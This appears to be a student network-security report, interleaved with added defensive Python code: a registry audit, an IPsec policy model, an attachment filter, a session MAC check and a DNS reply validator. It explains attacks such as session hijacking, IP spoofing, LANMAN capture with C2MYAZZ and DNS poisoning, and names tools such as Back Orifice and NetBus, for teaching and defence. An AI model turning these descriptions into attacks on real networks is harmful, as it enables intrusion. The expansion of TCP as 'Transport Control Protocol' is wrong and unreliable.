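read_live_settings() uses the standard ``winreg`` module and therefore
only works when executed on a Windows host. Nothing is ever written.
"""
import sys

# Registry paths named in the text (real locations; only read here)
LSA_KEY = r"SYSTEM\CurrentControlSet\Control\Lsa"
SNMP_COMMUNITIES_KEY = r"SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities"
SNMP_AGENTS_KEY = r"SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents"


def audit(restrict_anonymous, communities, extension_agents):
    """Return (severity, message) findings for one settings snapshot.

    restrict_anonymous: integer RestrictAnonymous value, or None if the value is absent
    communities:        {community name: rights value} from ValidCommunities
    extension_agents:   {value name such as "1": agent registry path} from ExtensionAgents
    """
    findings = []

    # NULL sessions: 0 or missing leaves anonymous enumeration open; 1 blocks the
    # sensitive data but some tools still work; 2 refuses NULL connections outright.
    if restrict_anonymous in (None, 0):
        findings.append(("high", "RestrictAnonymous unset/0: NULL sessions can enumerate accounts"))
    elif restrict_anonymous == 1:
        findings.append(("medium", "RestrictAnonymous=1: NULL sessions still allowed, prefer 2"))

    # Public SNMP: the well-known community name is what makes SNMP "public"
    for name in communities:
        if name.lower() == "public":
            findings.append(("high", "SNMP community 'public' still valid: remove or rename it"))

    # The LANManager MIB2 agent is the entry the text says to delete from ExtensionAgents
    for value_name, path in extension_agents.items():
        if "lanmanagermib2agent" in path.lower():
            findings.append(("medium", f"ExtensionAgents value {value_name} still loads LANManagerMIB2Agent"))

    # After the deletion the remaining values must be renumbered 1, 2, 3, ...
    numbers = sorted(int(n) for n in extension_agents if n.isdigit())
    if numbers != list(range(1, len(extension_agents) + 1)):
        findings.append(("low", f"ExtensionAgents value names {sorted(extension_agents)} are not 1..n"))

    return findings


def read_live_settings():
    """Fetch the three locations from the live registry (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live registry audit requires Windows")
    import winreg  # standard library, present only on Windows

    def values_of(path):
        out, index = {}, 0
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            while True:
                try:
                    name, data, _type = winreg.EnumValue(key, index)
                except OSError:          # raised once index runs past the last value
                    return out
                out[name] = data
                index += 1

    lsa = values_of(LSA_KEY)
    return lsa.get("RestrictAnonymous"), values_of(SNMP_COMMUNITIES_KEY), values_of(SNMP_AGENTS_KEY)


# Constructed snapshot of a machine before the steps above are applied
WEAK_SNAPSHOT = (
    0,
    {"public": 4},
    {"1": r"SOFTWARE\Microsoft\LANManagerMIB2Agent\CurrentVersion",
     "2": r"SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion"},
)

if __name__ == "__main__":
    settings = read_live_settings() if sys.platform == "win32" else WEAK_SNAPSHOT
    for severity, message in audit(*settings) or [("ok", "no findings")]:
        print(f"[{severity}] {message}")
```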


• Disable unused services since they take up space and allow hackers to attack
through the ports they leave open. We should disable the Messenger service if it is not used,
since a compromised Messenger service gives the hacker system rights.
• Local Security Policy Tips: To edit Windows 2000 or XP's Local Security
Policy follow this path:
- Start > Administrative Tools > Local Security Policy. The Local Security editor has the
same feel as the registry editor.
- Always set a password for the Administrator account.
- Set the password to 6 or more characters: Account Policies > Password Policy >
Minimum Password Length.
• Ensure passwords use a combination of letters and numbers.
To enable this setting, enable Account Policies > Password Policy > Password
Must Meet Complexity Requirements.

• Enable Account Lockout Period
• Account Lockout Duration
• Require users to change their passwords
• Account Lockout Threshold
• Account Tips: The more accounts on a computer, the more entry points attackers
can try. Default accounts will always get us into trouble because the attacker does not
have to guess a user name. We must always disable the guest account if it is not needed.
There are tools that will allow an attacker to create accounts with Administrative
privileges on an unpatched Windows 2000 system. We must not log in as administrator if
we do not need to. Viruses or malicious scripts will try to run programs or modify
registry settings. If the user does not have access to perform these tasks then the
malicious script cannot either.
• Terminal Services: 128-bit encryption must be used to avoid packet sniffers.
Change terminal services to log users off. If a session is left open a hacker might enter
that person's session. Another safety measure with Terminal Services is to change the port
from the default port of 3389. If you want to learn how to perform this edit refer to
appendix A. This method will not really stop attacks, just avoid attackers doing a quick
scan or targeting port 3389.
• Disable DNS Transfers - If using Active Directory, limit DNS zone transfers.
Otherwise attackers are allowed to scan the network and gain information about IP addresses and ports.
While there is no damage to our system by performing these scans, attackers can learn a
lot about your network. To disable go to:
- Start > Programs > Administrative Tools > Computer Management > Services and
Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.
- Add the IP addresses that are on your network. The best option is to disable zone
transfers by unchecking Allow Zone Transfers.
• Port Scanners are very useful tools for finding ports open on our system or
network. Here are a couple we might try: SuperScan, NetScanTools Pro, GFI, and NMap.

2.5 Network Layer Security
Network Layer Security among mutually trusting hosts is a relatively straightforward
problem to solve. The standard protocol technique, employed in IPSEC, involves
"encapsulating" an encrypted Network Layer packet inside a standard Network packet,
making the encryption transparent to intermediate nodes that must process packet headers
for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just
before being sent to the network, and incoming packets are decapsulated, verified, and
decrypted immediately upon receipt. Key management in such a protocol is similarly
straightforward in the simplest case. Two hosts can use any key-agreement protocol to
negotiate keys with one another, and simply use those keys as part of the encapsulating
and decapsulating packet transforms.
In many applications, security at the network layer has a number of advantages over
security provided elsewhere in the protocol stack. Network semantics are usually hidden
from applications, which therefore automatically and transparently take advantage of
whatever network layer security services their environment provides. Especially
importantly, the network layer offers a remarkable flexibility not possible at higher or
lower abstractions: security can be configured end-to-end (protecting traffic between two
hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-edge
(protecting traffic as it passes between "trusted" networks via an "untrusted" one),
or in any other configuration in which network nodes can be identified as appropriate
security endpoints.

2.5.1 TCP/IP – The Language of the Internet (refer to [12])
TCP/IP (Transport Control Protocol/Internet Protocol) is the "language" of the Internet.
Anything that can learn to "speak TCP/IP" can connect to the Internet. This is
functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI
Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix,
OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's
Navigator) that use the network.
As noted, IP is a "network layer" protocol. This is the layer that allows the hosts to
actually "talk" to each other. It handles such things as carrying datagrams, mapping the Internet
address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and
routing, which takes care of making sure that all of the devices that have Internet
connectivity can find the way to each other.

2.5.2 Attacks against IP (refer to [12])
A number of attacks against IP are possible. Typically, these exploit the fact that IP does
not provide a robust mechanism for authenticating the source of a packet. This is
not necessarily a weakness by definition, but it is an important point, because it means
that the facility of host authentication has to be provided at a higher layer of the ISO/OSI
Reference Model. Today, applications that require strong host authentication (such as
cryptographic applications) do this at the application layer.
• IP Spoofing
This is where one host claims to have the IP address of another. Since many systems
(such as router access control lists) define which packets may and which packets may not
pass based on the sender's IP address, this is a useful technique to an attacker: he can
send packets to a host, perhaps causing it to take some sort of action.
Additionally, some applications allow login based on the IP address of the person making
the request (such as the Berkeley r-commands). These are both good examples of how
trusting an untrustworthy layer provides security that is considered weak.
• IP Session Hijacking
This is a relatively sophisticated attack, first described by Steve Bellovin. It is very
dangerous, however, because there are now toolkits available in the underground
community that allow even inexperienced hackers to perform this attack. IP Session
Hijacking is an attack whereby a user's session is taken over and placed under the control of the
attacker. If the user was in the middle of email, the attacker is looking at the email, and
then can execute any commands he wishes as the attacked user. The attacked user simply
sees his session dropped, and may simply log in again, perhaps not even noticing that the
attacker is still logged in on his account.
For the description of the attack, refer to the large network of networks in Figure 2.1.

Figure 2.1: A Wider View of Internet-connected Networks

In this attack, a user on host A is carrying on a session with host G. Perhaps this is a
telnet session, where the user is reading his email, or using a Unix shell account from
home. Somewhere in the network between A and G sits host H . The person on host H
watches the traffic between A and G, and runs a tool which starts to impersonate A to G,
and at the same time tells A to shut up, perhaps trying to convince it that G is no longer
on the net (which might happen in the event of a crash, or major network outage). After a
few seconds of this, if the attack is successful, host H has "hijacked" the session of our
user. Anything that the user can do legitimately can now be done by the attacker,
illegitimately. As far as G knows, nothing has happened.
This can be solved by replacing standard telnet-type applications with encrypted versions
of the same thing. In this case, the attacker can still take over the session, but he'll see
only "gibberish" because the session is encrypted. The attacker will not have the needed
cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to
do anything with the session.
2.5.3 IPSEC Policy Architecture (refer to [13])
Let us examine the architecture of Network Layer Security more closely, using IPSEC as
a specific example. In this environment, policy must be enforced whenever packets arrive
at or are about to leave a Network Layer endpoint (which could be an end host, a
gateway, a router, or a firewall). When an incoming packet arrives from the network, the
security endpoint first determines the processing it requires:
- If the packet is not protected, should it be accepted? This is essentially the "traditional"
packet filtering problem, as performed, e.g., by network firewalls.
- If the packet was encapsulated under the security protocol:
Is there correct key material (usually contained in a data structure called a "security
association") required to decapsulate it? Should the resulting packet (after decapsulation)
be accepted?
A second stage of packet filtering occurs at this point. Notice that a packet may be
successfully decapsulated and still not be accepted (e.g., a decapsulated packet might
contain an illegal network source IP address such as 127.0.0.1).
A security endpoint makes similar decisions when an outgoing packet is ready to be sent:
- Is there a security association (SA) that should be applied to this packet?
If there are several applicable SAs, which one should be selected?
- If there is no SA available, how should the packet be handled? It may be forwarded to
some network interface, dropped, or queued until an SA is made available, possibly after
triggering some automated key management mechanism such as the IPSEC ISAKMP
protocol.
Observe that because these questions are asked on a packet-by-packet basis, policy filtering
must be performed, and any related security transforms applied, quickly enough to keep
up with network data rates. This implies that in all but the slowest network environments
there is insufficient time to process elaborate security languages, perform public key
operations, consult large tables, or resolve rule conflicts in any sophisticated manner.
Implementations of Network Layer Security services, including IPSEC and most
firewalls, therefore, usually employ very simple, filter-based languages for configuring
their packet-handling policies. In general, these languages specify routing rules for
handling packets that match bit patterns in packet headers, based on such parameters as
incoming and outgoing addresses and ports, services, packet options, etc.
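The inbound and outbound decisions above, as an added toy model in Python (not code from the report or from any IPsec implementation): rules are header selectors in the simple filter language the text describes, encapsulation is modelled by nesting one packet inside another, and the gateway addresses, networks and SPI are constructed.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class Packet:
    src: str
    dst: str
    proto: str = "tcp"
    dport: int = 0
    spi: Optional[int] = None          # set only on protected (encapsulated) packets
    inner: Optional["Packet"] = None   # the protected payload packet


@dataclass
class Rule:
    """One rule of the simple filter language: header selectors plus an action."""
    src_net: str                       # CIDR selector for the source address
    dst_net: str                       # CIDR selector for the destination address
    proto: str                         # "tcp", "udp", "icmp" or "any"
    dport: Optional[int]               # None matches any destination port
    action: str                        # "bypass" (send/accept plain), "discard", "protect"
    sa_name: Optional[str] = None      # protect rules name the SA family they require


@dataclass
class SA:
    name: str
    spi: int
    peer: str                          # remote security endpoint


def _matches(rule: Rule, pkt: Packet) -> bool:
    return (ipaddress.ip_address(pkt.src) in ipaddress.ip_network(rule.src_net)
            and ipaddress.ip_address(pkt.dst) in ipaddress.ip_network(rule.dst_net)
            and rule.proto in ("any", pkt.proto)
            and rule.dport in (None, pkt.dport))


def lookup(policy: List[Rule], pkt: Packet) -> Rule:
    """First matching rule wins; unmatched packets hit an implicit discard rule."""
    for rule in policy:
        if _matches(rule, pkt):
            return rule
    return Rule("0.0.0.0/0", "0.0.0.0/0", "any", None, "discard")


def inbound(pkt: Packet, policy: List[Rule], sa_db: Dict[int, SA]) -> Tuple[str, Packet]:
    """Decision for a packet arriving from the network."""
    if pkt.spi is None:
        # Unprotected: purely the traditional packet-filtering question. A plain packet
        # that matches a protect rule is dropped, which is what defeats spoofed traffic.
        return ("accept", pkt) if lookup(policy, pkt).action == "bypass" else ("drop", pkt)
    sa = sa_db.get(pkt.spi)
    if sa is None or pkt.inner is None or pkt.src != sa.peer:
        return ("drop", pkt)           # no usable key material for this SPI / wrong peer
    inner = pkt.inner                  # decapsulate (a real stack verifies and decrypts here)
    # Second-stage filter: a valid SA does not make an illegal inner packet acceptable
    if ipaddress.ip_address(inner.src).is_loopback:
        return ("drop", inner)
    rule = lookup(policy, inner)
    if rule.action == "protect" and rule.sa_name == sa.name:
        return ("accept", inner)
    return ("drop", inner)


def outbound(pkt: Packet, policy: List[Rule], sa_db: Dict[int, SA],
             local: str, no_sa: str = "queue") -> Tuple[str, Packet]:
    """Decision for a packet about to leave; no_sa ("drop" or "queue") says what to do
    with a protect rule that has no SA yet (queue = hold it while key management runs)."""
    rule = lookup(policy, pkt)
    if rule.action == "bypass":
        return ("send", pkt)
    if rule.action == "discard":
        return ("drop", pkt)
    # Several SAs may apply; pick deterministically (lowest SPI here)
    usable = sorted((sa for sa in sa_db.values() if sa.name == rule.sa_name),
                    key=lambda sa: sa.spi)
    if not usable:
        return (no_sa, pkt)
    sa = usable[0]
    # Encapsulate: outer header local -> peer carrying the SPI, inner packet protected
    return ("send", Packet(src=local, dst=sa.peer, proto="esp", spi=sa.spi, inner=pkt))


# Constructed edge-to-edge setup: this gateway 203.0.113.1 fronts 10.1.0.0/16 and the
# branch gateway 198.51.100.7 fronts 10.2.0.0/16; the mail server takes plain SMTP.
POLICY = [
    Rule("10.1.0.0/16", "10.2.0.0/16", "any", None, "protect", "branch-vpn"),
    Rule("10.2.0.0/16", "10.1.0.0/16", "any", None, "protect", "branch-vpn"),
    Rule("0.0.0.0/0", "10.1.0.10/32", "tcp", 25, "bypass"),
]
SA_DB = {0x1001: SA("branch-vpn", 0x1001, peer="198.51.100.7")}
```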

2.6 Internal Network Security
Although focusing on securing the network's perimeter is important, securing it internally
is equally important. If a hacker somehow manages to get into the network, he should
not be able to wander around easily without getting caught. Therefore, one should apply
the following to make the internal network secure:

• Patch and update all PCs before they are connected to the network, and then on a
regular basis. Note that patches need to be tested to avoid having problems with
databases or applications [3].
• System administrators should use one-time passwords only. In this way, in case a
hacker cracks the Admin's password, it would only be valid for this one session.
An example of a one-time password mechanism is SecurID by RSA [3].
• When an application is installed, some service accounts may be created. They are
accounts which do not have a human user associated to them. These accounts are
assigned default passwords that will most likely never be changed. Therefore, it is
important for an administrator to regularly change these passwords and monitor
the logs of these service accounts.
• Monitoring of logs is important: administrators should regularly read the logs to
monitor any unusual use of an account. Many freeware tools (such as log-IDS by
Adam Richard [3]) can help decipher the logs (which otherwise are almost
impossible to read) in something that the administrator can understand. Moreover,
by using a centralized syslog server, it will be much more difficult for hackers to
access them and edit them.
• Also, available freeware such as EventAlarm is useful when the administrator
wants to monitor a user's logging in and out quickly. Such freeware gives
pop-up alarms to the administrator whenever user X or Y logs on or off.
Moreover, this freeware can be licensed and additional options added so
that alarms are given in various situations.

• Segregating the network can reduce vulnerabilities. In this way, a user will have
specific privileges and would not be able to access all parts of the networks (like
vital servers, or other department’s files). So if ever a hacker cracks a user ID and
password, less damage will be made if there is segregation: he won’t be able to
access the whole network.
If these rules are properly followed in our FYP, potential problems can be lessened,
whether they come from a hacker that has got in or from a legitimate user with bad intentions.
2.7 Survey of Most Common Threats
We will begin by explaining attacks automated by malicious code, then hacker attacks
not automated by malicious code. DoS attacks will constitute a section of
their own because they are the most widespread attacks on the Internet. We will end
this section with an explanation of social engineering attacks.

2.7.1 Attacks Automated by Malicious Codes
Malicious code is a piece of software which can damage or alter data and programs on a
system without the permission or notice of the user. Its sequence of instructions is used
to intentionally cause adverse effects to the system.


Figure 2.2: Classification of malicious code


We can see from the above figure that there are two types of malicious code: code that needs a host
program and independent code. Code that needs a host program consists of fragments of programs that cannot
exist independently of some actual application program, utility or system program.
Independent code consists of self-contained programs that can be run by the operating system.
1. Trojan Horse
A Trojan horse is a malicious, security breaking program that is disguised as something
benign, such as a game, a directory lister or an archiver. The software is wrapped together
with the malicious code into a single file or program. The program appears to be
performing a useful function but it may also be quietly performing some harmful or
unwanted action such as deleting the victim’s files. The malicious code is typically a
back door, also known as an illicit server, but it can be a virus, worm or any other kind of
code that allows the attacker to do damage. Common ways to spread Trojan Horses are email, IRC
(Internet Relay Chat), and websites. An example of a Trojan horse file is: openme.gif.exe
(an extension is added to a seemingly harmless file). When the Trojan horse is executed it
will start its malicious job. If the job consists of planting a back door the attacker will be
notified (by email or IRC). Now the attacker can use the victim computer as a zombie in
a DDoS (Distributed Denial of Service; explained in a separate section later) attack to
flood a target system. The attacker can also remotely control the infected computer (open
the CD-ROM, send messages, open websites, reboot, listen to the microphone input,
delete files). The two most famous tools for creating back doors are Back Orifice and
NetBus. The backdoors are sent to the victim as Trojan horses (disguised as a harmless
program).
2. Virus
The virus is the most common type of malicious code. It can infect systems by attaching
itself to files and programs. Just like its biological counterpart, it needs a host to infect. A
virus is usually a program that needs to be executed by a user before it can do any
damage. For example, a virus attached to an email message is usually only harmful when
a user opens the attachment. Unlike a worm, a virus cannot infect other computers
without assistance. It is propagated, for example, by humans trading programs with their
friends or by e-mail. The virus might only propagate itself and then allow the program to
run normally (without doing further damage). However, usually, after propagating
silently for a while, it starts doing things like writing cute messages on the terminal or
playing strange tricks with the display, or even, in extreme cases, destroying all of the user's
files.
So in summary the four phases of the life of a virus (after being executed) are:
The dormant phase (not all viruses have this stage): The virus is idle; it will
eventually be activated by some event, such as a date, the presence of another program or
file, or the capacity of the disk exceeding some limit.
The propagation phase: The virus places an identical copy of itself into other programs or
into certain system areas on the disk. Each infected program will now contain a clone of
the virus, which will itself enter a propagation phase.
The triggering phase: The virus is activated to perform the function for which it was
intended. As with the dormant phase, the triggering phase can be caused by a variety of
system events such as a count of the number of times the virus has copied itself.
The execution phase: The function is performed. The function may be harmless, such as a
message on the screen, or damaging, such as the destruction of programs and data files.
There are also different types of computer viruses:

Figure 2.3: Main types of viruses



Memory-resident virus: Lodges in main memory as part of a resident system program.
From that point on, the virus infects every program that executes.

Program file virus: This is the most common type of virus; it attaches itself to executable
files such as .EXE and .COM. The file acts as a carrier and when the file is executed or
opened, the malicious code executes and the virus spreads to infect other files.


Figure 2.4: Program File Virus


Polymorphic virus: This type of virus has the ability to change its signature to avoid
detection by anti-virus software. It attempts to trick anti-virus software by slightly
modifying its own code when it spreads to other files. A polymorphic virus can modify
itself by encrypting or compressing part of its code.
Boot Sector Virus: This type of virus attaches itself to the boot sector of a floppy or hard
disk. When the computer boots, the virus will reside in its memory and infect other disks.
Modern main boards provide a BIOS option to enable boot sector virus protection, which
basically prevents modifications to the boot sector.
Stealth Virus: This type of virus attempts to hide itself to avoid detection by anti-virus
software. It attempts to mislead the services used to detect the virus. When the infected
file or boot sector is scanned by anti-virus software, the virus attempts to return the
properties of the original clean version of the file or boot sector.
Macro Virus: Macro viruses exploit vulnerabilities inherent to macro languages such as
Visual Basic in Microsoft Office. This type of virus is often found in Word documents.
When a user opens the document the malicious code is executed.
Email Virus: A more recent development in malicious software is the e-mail virus.
Rapidly spreading e-mail viruses make use of a Microsoft Word macro embedded in an
attachment. If the recipient opens the e-mail attachment, the Microsoft Word macro is
activated; the e-mail virus then sends itself to everyone on the mailing list in the user's e-mail
package and does local damage.
3. Worm
A worm is similar to a virus but there is one important difference: a worm doesn't
need to attach itself to a file or program to be reproduced and executed as a virus does. A
worm is self-contained; it can replicate itself and infect entire networks. Because of the
recursive structure of the propagation, the spread rate of worms is very fast and poses a
big threat to the Internet infrastructure as a whole. Examples of worms are: MyDoom,
Netsky, Bagle, Blaster, Code Red, Nimda.
4. Logic Bomb
A logic bomb is a smart piece of malicious code that executes only when certain
conditions are met; it is triggered when a certain event occurs. An example is a virus that
executes on April Fool’s day (but infected the system long before that date) or a
format.exe command that is executed only when the user logs on with administrative
permissions. Another example of a logic bomb sends a note to the hacker when the
infected computer is on the internet and runs a specific application such as MS Word.

This bomb does not actually begin the attack but tells the hacker that the victim has met
the needed state for an attack to begin.


Figure 2.5: Logic Bomb


1. Attacker implants logic bomb
2. Victim reports installation
3. Attacker sends attack message
Countermeasures against malicious code: Prevention and detection of malicious code
typically involves anti-virus and other detection products at gateways, mail servers, and
workstations. Those products generally scan messages for known signatures of a variety
of malicious code, or potentially dangerous behavioral characteristics. Differences
between products exist in detection capabilities and the range of malicious code included
in their signatures. Detection products should not be relied upon to detect all malicious
code. Additionally, anti-virus and other products that rely on signatures generally are
ineffective when the malicious code is encrypted. For example, VPNs, IPSec, and
encrypted e-mail will all shield malicious code from detection. Heuristic anti-virus
products generally execute code in a protected area of the host to analyze and detect any
hostile intent. Heuristic products are meant to defend against previously unknown or
disguised malicious code.

Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail attachments, as well
as any ActiveX or Java applets. A more refined strategy might block based on certain
characteristics of known code.

Protection of servers involves examining input from users
and only accepting that input which is expected. This activity is called filtering. If
filtering is not employed, a Web site visitor, for instance, could employ an attack that
inserts code into a response form, causing the server to perform certain actions. Those
actions could include changing or deleting data and initiating fund transfers. Protection
from malicious code also involves limiting the capabilities of the servers and Web
applications to only include functions necessary to support operations.

An additional detection control involves network and host intrusion detection devices. Network
intrusion detection devices can be tuned to alert when known malicious code attacks
occur. Host intrusion detection can be tuned to alert when they recognize abnormal
system behavior, the presence of unexpected files, and changes to other files.
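An added Python gateway attachment filter for the blocking strategy above (not the report's own code): it refuses executable and applet attachment types, catches executables disguised by a double extension (the openme.gif.exe trick from the Trojan horse section) or by a harmless name over an MZ header, and holds Office documents for macro scanning. The VBA-container check goes beyond the text, and all sample attachments are constructed.

```python
"""Gateway attachment filter: block executables, catch disguised ones, hold
documents that may carry macros. Samples below are constructed."""
import io
import zipfile

# Executable and applet attachment types a gateway would refuse outright
EXECUTABLE_EXT = {"exe", "com", "bat", "cmd", "scr", "pif", "vbs", "js", "wsf", "hta", "jar", "class"}
# Office 97-2003 binary formats: macros live inside the OLE file, so hold them for scanning
OLE_OFFICE_EXT = {"doc", "dot", "xls", "xlt", "ppt"}
MZ_HEADER = b"MZ"       # first bytes of every Windows executable
ZIP_HEADER = b"PK"      # OOXML documents (docx/docm/...) are zip containers


def _zip_has_vba(data):
    """True if a zip container carries a VBA project (macro-enabled Office file)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            return any(name.lower().endswith("vbaproject.bin") for name in archive.namelist())
    except zipfile.BadZipFile:
        return False


def classify(filename, data):
    """Return ("allow" | "block" | "scan", [reasons]) for one attachment."""
    exts = filename.lower().split(".")[1:]        # "openme.gif.exe" -> ["gif", "exe"]
    last = exts[-1] if exts else ""
    reasons = []
    if last in EXECUTABLE_EXT:
        reasons.append(f"executable attachment type .{last}")
        if len(exts) > 1:
            reasons.append(f"double extension: presented as .{exts[-2]}")
    elif data.startswith(MZ_HEADER):
        reasons.append("content is a Windows executable (MZ header) despite its name")
    if last in OLE_OFFICE_EXT:
        reasons.append("Office 97-2003 document may contain macros")
    if data.startswith(ZIP_HEADER) and _zip_has_vba(data):
        reasons.append("embedded VBA project found in document container")
    if not reasons:
        return ("allow", reasons)
    if any(r.startswith(("executable", "double", "content")) for r in reasons):
        return ("block", reasons)
    return ("scan", reasons)


def filter_message(attachments):
    """Split (filename, bytes) pairs into delivered, held-for-scanning and blocked."""
    verdicts = {"allow": [], "scan": [], "block": []}
    for name, data in attachments:
        verdict, reasons = classify(name, data)
        verdicts[verdict].append((name, reasons))
    return verdicts


def make_zip(entries):
    """Build an in-memory zip (constructed stand-in for an OOXML document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        for name, content in entries.items():
            archive.writestr(name, content)
    return buf.getvalue()


# Constructed sample attachments
SAMPLE_ATTACHMENTS = [
    ("notes.txt", b"meeting at ten"),
    ("openme.gif.exe", b"MZ\x90\x00" + b"\x00" * 60),
    ("photo.gif", b"MZ\x90\x00" + b"\x00" * 60),
    ("report.doc", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24),
    ("macros.docm", make_zip({"word/document.xml": b"<w/>", "word/vbaProject.bin": b"\x00"})),
    ("plain.docx", make_zip({"word/document.xml": b"<w/>"})),
]

if __name__ == "__main__":
    for verdict, items in filter_message(SAMPLE_ATTACHMENTS).items():
        for name, reasons in items:
            print(f"{verdict:5} {name}: {'; '.join(reasons) or 'no findings'}")
```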
2.7.2 Hacker Attacks (not automated by malicious code)
1. Eavesdropping

The name eavesdropping comes from the fact that this technique involves secretly
listening to the data traveling through the attacked network. Other names for
eavesdropping include sniffing and snooping. Eavesdropping is only possible because
most data sent through connections is sent as unencrypted plaintext. Thus, a
hacker can just listen to the connection stream between the two connected users and get
whatever information he needs. This method is usually employed by those who are
unwilling to take large risks as it is a very low-risk method. There is almost no
chance of getting caught when this method is used as no intrusion is involved and the
hacker can back off quickly without a trace if anything goes wrong. This method is also
used by those who want to listen to what is shared between two people, be it secret data
or just a personal conversation. In this respect, this method is the best for spies and
blackmailers [14].
2. IP spoofing
Most networks and operating systems use the IP address of a computer to identify a valid
entity. In certain cases, it is possible for an IP address to be falsely assumed (identity
spoofing). An attacker might also use special programs to construct IP packets that
appear to originate from valid addresses inside the corporate intranet. After gaining
access to the network with a valid IP address, the attacker can modify, reroute, or delete
your data. The attack may be directed to a specific computer addressed as though it is
from that same computer. This may make the computer think that it is talking to itself.
This may cause some operating systems such as Windows to crash or lock up.
3. Man in the middle attack
As the name indicates, a man-in-the-middle attack occurs when someone between you
and the person with whom you are communicating is actively monitoring, capturing, and
controlling your communication transparently. For example, the attacker can re-route a
data exchange. When computers are communicating at low levels of the network layer,
the computers might not be able to determine with whom they are exchanging data.
Session hijacking occurs through the following scenario. First, the attacker watches a
session open on a network. Once authentication is complete, he attacks the client
computer to disable it, and uses IP spoofing to claim to be the client who was just
authenticated and steal the session. Man-in-the-middle attacks are like someone assuming
your identity in order to read your message. The person on the other end might believe it
is you because the attacker might be actively replying as you to keep the exchange going
and gain more information.
Countermeasure: This attack can be prevented if the two legitimate systems share a
secret which is checked periodically during the session.
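One way to realise this countermeasure in code, as an added example that is not part of the original report: every message of the session carries a sequence number and an HMAC computed over it with the shared secret, so a party inserted in the middle, who does not hold the secret, can neither alter a message nor replay or inject one without the receiver's check failing. How the two endpoints obtained the shared key, the class names and the message layout are assumptions made for the illustration.

```python
import hmac
import hashlib
import secrets

# Assumed: both endpoints obtained the same session secret through an
# authenticated key exchange that happened before this code runs.
def new_session_key() -> bytes:
    return secrets.token_bytes(32)

def _mac(key: bytes, seq: int, payload: bytes) -> bytes:
    # Bind the sequence number into the MAC so a valid old message cannot
    # be replayed at a different position in the stream.
    return hmac.new(key, seq.to_bytes(8, "big") + payload, hashlib.sha256).digest()

class Sender:
    def __init__(self, key: bytes):
        self.key = key
        self.seq = 0

    def send(self, payload: bytes) -> dict:
        self.seq += 1
        return {"seq": self.seq, "payload": payload,
                "tag": _mac(self.key, self.seq, payload)}

class Receiver:
    def __init__(self, key: bytes):
        self.key = key
        self.last_seq = 0  # highest sequence number accepted so far

    def receive(self, msg: dict) -> bool:
        """Return True only if the message is authentic and not a replay."""
        expected = _mac(self.key, msg["seq"], msg["payload"])
        if not hmac.compare_digest(expected, msg["tag"]):
            return False            # modified in transit or forged without the key
        if msg["seq"] <= self.last_seq:
            return False            # replayed, or an old message re-sent
        self.last_seq = msg["seq"]
        return True

def demo() -> dict:
    """Constructed session: one legitimate message, then three man-in-the-middle attempts."""
    key = new_session_key()
    alice, bob = Sender(key), Receiver(key)

    genuine = alice.send(b"transfer 100 to account 42")
    accepted = bob.receive(genuine)

    tampered = dict(genuine, payload=b"transfer 100 to account 99")   # altered in transit
    altered_rejected = not bob.receive(tampered)

    replayed_rejected = not bob.receive(genuine)                      # same message again

    mitm = Sender(secrets.token_bytes(32))      # attacker holding a key of his own, not the shared one
    injected = mitm.send(b"transfer 100 to account 99")
    injected["seq"] = alice.seq + 1             # even with a plausible sequence number
    injected_rejected = not bob.receive(injected)

    return {"accepted": accepted, "altered_rejected": altered_rejected,
            "replayed_rejected": replayed_rejected, "injected_rejected": injected_rejected}
```

The secret is checked on every message rather than only periodically, which is the stronger form of the report's countermeasure; the sequence number is what turns a per-message check into protection of the whole session, since without it a captured genuine message could be re-sent later.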
4. Server spoofing
A C2MYAZZ utility can be run on Windows 95 stations to request LANMAN (The
LanMan password hash is used by Windows NT for authenticating users locally and over
the network [16]) authentication from the client. The attacker runs this utility while
posing as the server as the user attempts to log in. If the client is tricked into sending
LANMAN authentication, the attacker can read the username and password from the
network packets that were sent. [15]
Countermeasure: New operating systems are not vulnerable.
5. DNS poisoning
This is an attack in which DNS information is falsified. It can succeed under the
right conditions, but may not be very practical as an attack form. The attacker sends
incorrect DNS information which can cause traffic to be diverted. The DNS information
can be falsified because name servers do not verify the source of a DNS reply. When a DNS
request is sent, an attacker can send a false DNS reply carrying additional bogus information
which the requesting DNS server may cache. This attack can be used to divert users from
the correct web server, such as a bank's, and capture information from customers when they
attempt to log on. [15]
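The checks a resolver can apply before caching a reply, as an added example that is not part of the original report: the reply must carry the transaction ID the resolver chose, must come from the server the query was sent to, must repeat the question that was asked, and any additional records outside the queried zone (the "bailiwick") are discarded rather than cached. The outstanding query, the reply records and the zone boundary are constructed for the illustration; addresses are documentation ranges.

```python
# Outstanding query, constructed: the resolver sent "www.example.com A" to 192.0.2.53.
PENDING = {
    "txid": 0x1A2B,                      # transaction ID the resolver chose
    "server": ("192.0.2.53", 53),        # where the query was sent
    "qname": "www.example.com",
    "qtype": "A",
    "zone": "example.com",               # assumed: zone the queried server is authoritative for
}

def in_bailiwick(name: str, zone: str) -> bool:
    """True if `name` is `zone` itself or lies beneath it."""
    name, zone = name.lower().rstrip("."), zone.lower().rstrip(".")
    return name == zone or name.endswith("." + zone)

def validate_reply(pending: dict, reply: dict):
    """Return (accept, cacheable_records, reason)."""
    if reply["txid"] != pending["txid"]:
        return False, [], "transaction ID mismatch"
    if reply["src"] != pending["server"]:
        return False, [], "reply did not come from the queried server"
    if (reply["qname"].lower(), reply["qtype"]) != (pending["qname"].lower(), pending["qtype"]):
        return False, [], "question section does not match the query"
    cacheable, dropped = [], []
    for rr in reply["answers"] + reply["additional"]:
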